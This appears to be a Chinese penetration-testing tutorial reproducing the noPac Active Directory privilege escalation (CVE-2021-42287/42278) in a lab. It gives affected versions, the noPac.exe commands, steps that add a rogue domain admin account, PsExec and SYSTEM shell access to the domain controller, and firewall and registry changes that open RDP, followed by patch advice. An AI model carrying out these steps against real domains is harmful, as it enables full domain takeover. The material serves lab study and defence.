内网渗透：六、CVE-2021-42287/CVE-2021-42278 域内提权

 0x01 简介

        2021 年 11 月 9 日，国外研究员在推特上发布了 Active Directory 相关的 CVE，CVE-2021-42278 & CVE-2021-42287 ，两个漏洞组合可导致域内普通用户权限提升至域管权限。0x02 影响0x02 范围

CVE-2021-42287：
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
CVE-2021-42278：
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2019
Windows Server 2012 R2 (Server Core installation)

0x03  实验环境

---------------------------------------------------------------------------------------------------------------------------------

实验环境：

• Windows server 2008 作为域控制器，

                域名: dc.com 

                密码：qwer1234.

                计算机名：WIN-KU2266DTQ7P

• Windows 10 作为 dc域下的一台设备

                账号：dc\zhangsan

                密码：qwer1234.

---------------------------------------------------------------------------------------------------------------------------------

0x04 复现测试

环境的搭建：内网渗透：一、域控的搭建

漏洞复现：

1、自动化

利用脚本：https://github.com/cube0x0/noPac，需要自己编译为exe文件

 在域内主机上执行：

noPac.exe  scan  -domain  dc.com   -user  zhangsan  -pass qwer1234.

可以看到是存在漏洞，能拿到票据。执行一下命令传递票据。

 此时域控上会多出一个test的账号

  注意此时该cmd已经提权

 添加域管账号

net user dc_admin QWEasd@123 /add /domain
net group "Domain Admins" dc_admin /add /domain

 

查看域管账户是否添加成功：

net group "domain admins" /domain

 

有了域控账密，可以使用PsExec64.exe来对域控进行下一步的操作，开3389之类的

PsExec64.exe -u  dc\dc_admin -i -p QWEasd@123 -s cmd.exe     //本地使用域控的cmd，-s使用system权限来运行，不然会被拒绝，执行不了一些命令

这里需要注意一个坑，有的机制在执行完exe后，cmd会保持提权状态，但是实验用到的windwos 10 cmd无法长久保持提权，只能更换登录用户为之前创建的域管账户dc_admin

直接打开cmd（管理员），执行命令

 此时可以执行命令：

PsExec64.exe \\192.168.180.130  -u  dc\dc_admin  -p QWEasd@123 -s cmd.exe

#注意，必须需要管理员权限的cmd才可以执行，如果cmd提权不能保持，则需要手动切换到cmd(管理员)下执行

 

此时如果域控还没有开启3389。

尝试开启域控3389，修改防火墙策略。

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

开启远程：

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

使用新建的域控账密登录试试：

账号：dc_admin

密码：QWEasd@123

 

 第二种方法：

不打包成exe,一步步执行，详情参考：CVE-2021-42287/CVE-2021-42278 域内提权 - 云+社区 - 腾讯云

0x05 修复建议

1. 微软官方已推出补丁：KB5008602、KB5008380，或者更新windows系统
2. 通过域控的 ADSI 编辑器工具将 AD 域的 MAQ 配置为 0，中断此漏洞的利用链。

参考链接：https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html